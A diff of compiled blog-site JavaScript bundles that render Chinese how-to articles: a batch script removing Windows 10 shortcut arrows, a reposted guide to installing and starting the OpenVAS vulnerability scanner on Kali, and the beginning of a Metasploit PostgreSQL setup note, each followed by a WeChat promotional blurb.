」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[e._v("冰河技术")]),e._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),e._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=r.exports}}]);
\ No newline at end of file
此差异已折叠。
此差异已折叠。
此差异已折叠。
(window.webpackJsonp=window.webpackJsonp||[]).push([[258],{549:function(s,a,t){"use strict";t.r(a);var e=t(7),r=Object(e.a)({},(function(){var s=this,a=s._self._c;return a("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[a("h1",{attrs:{id:"win10完美去除桌面快捷图标小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#win10完美去除桌面快捷图标小箭头"}},[s._v("#")]),s._v(" Win10完美去除桌面快捷图标小箭头")]),s._v(" "),a("p",[s._v("这两天笔记本硬盘坏了,一些数据不能恢复了,哎,才买了一年多的电脑,竟然因为硬盘老化突然出现很多磁盘坏道,尝试各种方式读盘均失败,各种工具都无法检测磁盘的存在。无奈之下,拿到电脑维修部去修,同样无法恢复数据!!!")]),s._v(" "),a("p",[s._v("还好,有些内容是永久保留在了头脑中,所以,记在头脑中的东西才是永恒的。")]),s._v(" "),a("p",[s._v("今天,给大家分享一个如何完美去除Win10桌面快捷图标小箭头的技巧,希望能够给大家带来帮助。")]),s._v(" "),a("h2",{attrs:{id:"去掉小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#去掉小箭头"}},[s._v("#")]),s._v(" 去掉小箭头")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v('reg add "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" /v 29 /d "%systemroot%\\system32\\imageres.dll,197" /t reg_sz /f\ntaskkill /f /im explorer.exe\nattrib -s -r -h "%userprofile%\\AppData\\Local\\iconcache.db"\ndel "%userprofile%\\AppData\\Local\\iconcache.db" /f /q\nstart explorer\npause\n')])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("复制上面的代码。新建一个文本文件。粘贴后另存为.bat文件,然后以管理员身份打开。 ok!")]),s._v(" "),a("h2",{attrs:{id:"恢复小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#恢复小箭头"}},[s._v("#")]),s._v(" 恢复小箭头")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v('reg delete "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" /v 29 /f\ntaskkill /f /im explorer.exe\nattrib -s -r -h "%userprofile%\\AppData\\Local\\iconcache.db"\ndel "%userprofile%\\AppData\\Local\\iconcache.db" /f /q\nstart explorer\npause\n')])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("同理,将上述代码另存为.bat文件,管理员身份打开。就可恢复小箭头了。")]),s._v(" "),a("p",[s._v("这种方法不会导致任何问题可放心使用")]),s._v(" "),a("h1",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=r.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[258],{548:function(s,a,t){"use strict";t.r(a);var e=t(7),r=Object(e.a)({},(function(){var s=this,a=s._self._c;return a("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[a("h1",{attrs:{id:"win10完美去除桌面快捷图标小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#win10完美去除桌面快捷图标小箭头"}},[s._v("#")]),s._v(" Win10完美去除桌面快捷图标小箭头")]),s._v(" "),a("p",[s._v("这两天笔记本硬盘坏了,一些数据不能恢复了,哎,才买了一年多的电脑,竟然因为硬盘老化突然出现很多磁盘坏道,尝试各种方式读盘均失败,各种工具都无法检测磁盘的存在。无奈之下,拿到电脑维修部去修,同样无法恢复数据!!!")]),s._v(" "),a("p",[s._v("还好,有些内容是永久保留在了头脑中,所以,记在头脑中的东西才是永恒的。")]),s._v(" "),a("p",[s._v("今天,给大家分享一个如何完美去除Win10桌面快捷图标小箭头的技巧,希望能够给大家带来帮助。")]),s._v(" "),a("h2",{attrs:{id:"去掉小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#去掉小箭头"}},[s._v("#")]),s._v(" 去掉小箭头")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v('reg add "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" /v 29 /d "%systemroot%\\system32\\imageres.dll,197" /t reg_sz /f\ntaskkill /f /im explorer.exe\nattrib -s -r -h "%userprofile%\\AppData\\Local\\iconcache.db"\ndel "%userprofile%\\AppData\\Local\\iconcache.db" /f /q\nstart explorer\npause\n')])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("复制上面的代码。新建一个文本文件。粘贴后另存为.bat文件,然后以管理员身份打开。 ok!")]),s._v(" "),a("h2",{attrs:{id:"恢复小箭头"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#恢复小箭头"}},[s._v("#")]),s._v(" 恢复小箭头")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v('reg delete "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" /v 29 /f\ntaskkill /f /im explorer.exe\nattrib -s -r -h "%userprofile%\\AppData\\Local\\iconcache.db"\ndel "%userprofile%\\AppData\\Local\\iconcache.db" /f /q\nstart explorer\npause\n')])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br"),a("span",{staticClass:"line-number"},[s._v("2")]),a("br"),a("span",{staticClass:"line-number"},[s._v("3")]),a("br"),a("span",{staticClass:"line-number"},[s._v("4")]),a("br"),a("span",{staticClass:"line-number"},[s._v("5")]),a("br"),a("span",{staticClass:"line-number"},[s._v("6")]),a("br")])]),a("p",[s._v("同理,将上述代码另存为.bat文件,管理员身份打开。就可恢复小箭头了。")]),s._v(" "),a("p",[s._v("这种方法不会导致任何问题可放心使用")]),s._v(" "),a("h1",{attrs:{id:"写在最后"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),a("blockquote",[a("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),a("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),a("p",[a("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);a.default=r.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[259],{550:function(e,n,a){"use strict";a.r(n);var s=a(7),t=Object(s.a)({},(function(){var e=this,n=e._self._c;return n("ContentSlotsDistributor",{attrs:{"slot-key":e.$parent.slotKey}},[n("h1",{attrs:{id:"openvas-8-0-vulnerability-scanning"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#openvas-8-0-vulnerability-scanning"}},[e._v("#")]),e._v(" OpenVAS 8.0 Vulnerability Scanning")]),e._v(" "),n("p",[n("strong",[e._v("Vulnerability scanning")]),e._v(" is a crucial phase of a penetration test and having an updated vulnerability scanner in your security toolkit can often make a real difference by helping you discover overlooked vulnerable items. For this reason, we’ve manually packaged the latest and newly released "),n("a",{attrs:{href:"http://www.openvas.org/",target:"_blank",rel:"noopener noreferrer"}},[e._v("OpenVAS"),n("OutboundLink")],1),e._v(" 8.0 tool and libraries for Kali Linux. Although nothing major has changed in this release in terms of running the vulnerability scanner, we wanted to give a quick overview on how to get it up and running.")]),e._v(" "),n("h2",{attrs:{id:"setting-up-kali-for-vulnerability-scanning"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#setting-up-kali-for-vulnerability-scanning"}},[e._v("#")]),e._v(" Setting up Kali for Vulnerability Scanning")]),e._v(" "),n("p",[e._v("If you haven’t already, make sure your Kali is up-to-date and install the latest OpenVAS. Once done, run the "),n("strong",[e._v("openvas-setup")]),e._v(" command to setup OpenVAS, download the latest rules, create an admin user, and start up the various services. Depending on your bandwidth and computer resources, this could take a while.")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# apt-get update\nroot@kali:~# apt-get dist-upgrade\n\nroot@kali:~# apt-get install openvas\nroot@kali:~# openvas-setup\n/var/lib/openvas/private/CA created\n/var/lib/openvas/CA created\n\n[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.\n[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed\n...\nsent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec\ntotal size is 681654050 speedup is 1.00\n[i] Initializing scap database\n[i] Updating CPEs\n[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml\n[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml\n...\nWrite out database with 1 new entries\nData Base Updated\nRestarting Greenbone Security Assistant: gsad.\nUser created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br"),n("span",{staticClass:"line-number"},[e._v("6")]),n("br"),n("span",{staticClass:"line-number"},[e._v("7")]),n("br"),n("span",{staticClass:"line-number"},[e._v("8")]),n("br"),n("span",{staticClass:"line-number"},[e._v("9")]),n("br"),n("span",{staticClass:"line-number"},[e._v("10")]),n("br"),n("span",{staticClass:"line-number"},[e._v("11")]),n("br"),n("span",{staticClass:"line-number"},[e._v("12")]),n("br"),n("span",{staticClass:"line-number"},[e._v("13")]),n("br"),n("span",{staticClass:"line-number"},[e._v("14")]),n("br"),n("span",{staticClass:"line-number"},[e._v("15")]),n("br"),n("span",{staticClass:"line-number"},[e._v("16")]),n("br"),n("span",{staticClass:"line-number"},[e._v("17")]),n("br"),n("span",{staticClass:"line-number"},[e._v("18")]),n("br"),n("span",{staticClass:"line-number"},[e._v("19")]),n("br"),n("span",{staticClass:"line-number"},[e._v("20")]),n("br"),n("span",{staticClass:"line-number"},[e._v("21")]),n("br"),n("span",{staticClass:"line-number"},[e._v("22")]),n("br")])]),n("p",[e._v("Once "),n("strong",[e._v("openvas-setup")]),e._v(" completes its process, the OpenVAS manager, scanner, and GSAD services should be listening:")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# netstat -antp\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\ntcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd\ntcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai\ntcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br"),n("span",{staticClass:"line-number"},[e._v("6")]),n("br")])]),n("h2",{attrs:{id:"starting-the-openvas-services"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#starting-the-openvas-services"}},[e._v("#")]),e._v(" Starting the OpenVAS services")]),e._v(" "),n("p",[e._v("If you have already configured OpenVAS, you can simply start all the necessary services by running "),n("strong",[e._v("openvas-start")]),e._v(".")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# openvas-start\nStarting OpenVas Services\nStarting Greenbone Security Assistant: gsad.\nStarting OpenVAS Scanner: openvassd.\nStarting OpenVAS Manager: openvasmd.\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br")])]),n("p",[e._v("If you need to troubleshoot any issues, you can use "),n("strong",[e._v("openvas-check-setup")]),e._v(" to identity the problem.")]),e._v(" "),n("h2",{attrs:{id:"connecting-to-the-openvas-web-interface"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#connecting-to-the-openvas-web-interface"}},[e._v("#")]),e._v(" Connecting to the OpenVAS Web Interface")]),e._v(" "),n("p",[e._v("Point your browser to "),n("strong",[e._v("https://127.0.0.1:9392")]),e._v(", accept the self signed SSL certificate and plugin the credentials for the "),n("strong",[e._v("admin")]),e._v(" user. The admin password was generated during the setup phase (look at the output above if you missed it).")]),e._v(" "),n("p",[n("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/2019012013305928.png",loading:"lazy"}})]),e._v(" "),n("p",[e._v("openvas vulnerability scanner")]),e._v(" "),n("p",[e._v("That’s it! Now OpenVAS is ready for you to configure it and run a scan against a given IP or range. Happy vulnerability scanning!")]),e._v(" "),n("p",[e._v("转自:https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/")]),e._v(" "),n("p",[n("strong",[e._v("注意:")])]),e._v(" "),n("p",[e._v("如果不小心忘记了OpenVAS的Web登录密码或者没有找到OpenVAS安装过程中输出的默认密码,则通过如下的命令修改OpenVAS的Web登录密码:")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("openvasmd --create-user --help\nopenvasmd --user admin --new-password '新密码'\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br")])]),n("p",[e._v("这样我们就可以将OpenVAS的Web密码修改为新密码,从而登录OpenVAS的Web端。")]),e._v(" "),n("h1",{attrs:{id:"写在最后"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[e._v("#")]),e._v(" 写在最后")]),e._v(" "),n("blockquote",[n("p",[e._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),e._v(" "),n("p",[n("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);n.default=t.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[259],{549:function(e,n,a){"use strict";a.r(n);var s=a(7),t=Object(s.a)({},(function(){var e=this,n=e._self._c;return n("ContentSlotsDistributor",{attrs:{"slot-key":e.$parent.slotKey}},[n("h1",{attrs:{id:"openvas-8-0-vulnerability-scanning"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#openvas-8-0-vulnerability-scanning"}},[e._v("#")]),e._v(" OpenVAS 8.0 Vulnerability Scanning")]),e._v(" "),n("p",[n("strong",[e._v("Vulnerability scanning")]),e._v(" is a crucial phase of a penetration test and having an updated vulnerability scanner in your security toolkit can often make a real difference by helping you discover overlooked vulnerable items. For this reason, we’ve manually packaged the latest and newly released "),n("a",{attrs:{href:"http://www.openvas.org/",target:"_blank",rel:"noopener noreferrer"}},[e._v("OpenVAS"),n("OutboundLink")],1),e._v(" 8.0 tool and libraries for Kali Linux. Although nothing major has changed in this release in terms of running the vulnerability scanner, we wanted to give a quick overview on how to get it up and running.")]),e._v(" "),n("h2",{attrs:{id:"setting-up-kali-for-vulnerability-scanning"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#setting-up-kali-for-vulnerability-scanning"}},[e._v("#")]),e._v(" Setting up Kali for Vulnerability Scanning")]),e._v(" "),n("p",[e._v("If you haven’t already, make sure your Kali is up-to-date and install the latest OpenVAS. Once done, run the "),n("strong",[e._v("openvas-setup")]),e._v(" command to setup OpenVAS, download the latest rules, create an admin user, and start up the various services. Depending on your bandwidth and computer resources, this could take a while.")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# apt-get update\nroot@kali:~# apt-get dist-upgrade\n\nroot@kali:~# apt-get install openvas\nroot@kali:~# openvas-setup\n/var/lib/openvas/private/CA created\n/var/lib/openvas/CA created\n\n[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.\n[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed\n...\nsent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec\ntotal size is 681654050 speedup is 1.00\n[i] Initializing scap database\n[i] Updating CPEs\n[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml\n[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml\n...\nWrite out database with 1 new entries\nData Base Updated\nRestarting Greenbone Security Assistant: gsad.\nUser created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br"),n("span",{staticClass:"line-number"},[e._v("6")]),n("br"),n("span",{staticClass:"line-number"},[e._v("7")]),n("br"),n("span",{staticClass:"line-number"},[e._v("8")]),n("br"),n("span",{staticClass:"line-number"},[e._v("9")]),n("br"),n("span",{staticClass:"line-number"},[e._v("10")]),n("br"),n("span",{staticClass:"line-number"},[e._v("11")]),n("br"),n("span",{staticClass:"line-number"},[e._v("12")]),n("br"),n("span",{staticClass:"line-number"},[e._v("13")]),n("br"),n("span",{staticClass:"line-number"},[e._v("14")]),n("br"),n("span",{staticClass:"line-number"},[e._v("15")]),n("br"),n("span",{staticClass:"line-number"},[e._v("16")]),n("br"),n("span",{staticClass:"line-number"},[e._v("17")]),n("br"),n("span",{staticClass:"line-number"},[e._v("18")]),n("br"),n("span",{staticClass:"line-number"},[e._v("19")]),n("br"),n("span",{staticClass:"line-number"},[e._v("20")]),n("br"),n("span",{staticClass:"line-number"},[e._v("21")]),n("br"),n("span",{staticClass:"line-number"},[e._v("22")]),n("br")])]),n("p",[e._v("Once "),n("strong",[e._v("openvas-setup")]),e._v(" completes its process, the OpenVAS manager, scanner, and GSAD services should be listening:")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# netstat -antp\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\ntcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd\ntcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai\ntcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br"),n("span",{staticClass:"line-number"},[e._v("6")]),n("br")])]),n("h2",{attrs:{id:"starting-the-openvas-services"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#starting-the-openvas-services"}},[e._v("#")]),e._v(" Starting the OpenVAS services")]),e._v(" "),n("p",[e._v("If you have already configured OpenVAS, you can simply start all the necessary services by running "),n("strong",[e._v("openvas-start")]),e._v(".")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("root@kali:~# openvas-start\nStarting OpenVas Services\nStarting Greenbone Security Assistant: gsad.\nStarting OpenVAS Scanner: openvassd.\nStarting OpenVAS Manager: openvasmd.\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br"),n("span",{staticClass:"line-number"},[e._v("3")]),n("br"),n("span",{staticClass:"line-number"},[e._v("4")]),n("br"),n("span",{staticClass:"line-number"},[e._v("5")]),n("br")])]),n("p",[e._v("If you need to troubleshoot any issues, you can use "),n("strong",[e._v("openvas-check-setup")]),e._v(" to identity the problem.")]),e._v(" "),n("h2",{attrs:{id:"connecting-to-the-openvas-web-interface"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#connecting-to-the-openvas-web-interface"}},[e._v("#")]),e._v(" Connecting to the OpenVAS Web Interface")]),e._v(" "),n("p",[e._v("Point your browser to "),n("strong",[e._v("https://127.0.0.1:9392")]),e._v(", accept the self signed SSL certificate and plugin the credentials for the "),n("strong",[e._v("admin")]),e._v(" user. The admin password was generated during the setup phase (look at the output above if you missed it).")]),e._v(" "),n("p",[n("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/2019012013305928.png",loading:"lazy"}})]),e._v(" "),n("p",[e._v("openvas vulnerability scanner")]),e._v(" "),n("p",[e._v("That’s it! Now OpenVAS is ready for you to configure it and run a scan against a given IP or range. Happy vulnerability scanning!")]),e._v(" "),n("p",[e._v("转自:https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/")]),e._v(" "),n("p",[n("strong",[e._v("注意:")])]),e._v(" "),n("p",[e._v("如果不小心忘记了OpenVAS的Web登录密码或者没有找到OpenVAS安装过程中输出的默认密码,则通过如下的命令修改OpenVAS的Web登录密码:")]),e._v(" "),n("div",{staticClass:"language- line-numbers-mode"},[n("pre",{pre:!0,attrs:{class:"language-text"}},[n("code",[e._v("openvasmd --create-user --help\nopenvasmd --user admin --new-password '新密码'\n")])]),e._v(" "),n("div",{staticClass:"line-numbers-wrapper"},[n("span",{staticClass:"line-number"},[e._v("1")]),n("br"),n("span",{staticClass:"line-number"},[e._v("2")]),n("br")])]),n("p",[e._v("这样我们就可以将OpenVAS的Web密码修改为新密码,从而登录OpenVAS的Web端。")]),e._v(" "),n("h1",{attrs:{id:"写在最后"}},[n("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[e._v("#")]),e._v(" 写在最后")]),e._v(" "),n("blockquote",[n("p",[e._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),n("strong",[e._v("冰河技术")]),e._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),e._v(" "),n("p",[n("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);n.default=t.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[260],{551:function(s,a,t){"use strict";t.r(a);var e=t(7),r=Object(e.a)({},(function(){var s=this,a=s._self._c;return a("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[a("h1",{attrs:{id:"kali-metasploit-连接-postgresql-默认密码"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#kali-metasploit-连接-postgresql-默认密码"}},[s._v("#")]),s._v(" kali Metasploit 连接 Postgresql 默认密码")]),s._v(" "),a("h2",{attrs:{id:"启动-postgresql"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#启动-postgresql"}},[s._v("#")]),s._v(" 启动 postgresql")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("service postgresql start\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("p",[s._v("postgresql开机自启动")]),s._v(" "),a("div",{staticClass:"language- line-numbers-mode"},[a("pre",{pre:!0,attrs:{class:"language-text"}},[a("code",[s._v("update-rc.d postgresql enable\n")])]),s._v(" "),a("div",{staticClass:"line-numbers-wrapper"},[a("span",{staticClass:"line-number"},[s._v("1")]),a("br")])]),a("h2",{attrs:{id:"自行测试-postgresql-是否安装成功"}},[a("a",{staticClass:"header-anchor",attrs:{href:"#自行测试-postgresql-是否安装成功"}},[s._v("#")]),s._v(" 自行测试 postgresql 是否安装成功")]),s._v(" "),a("p",[s._v("根据需要,自行 修改 postgres 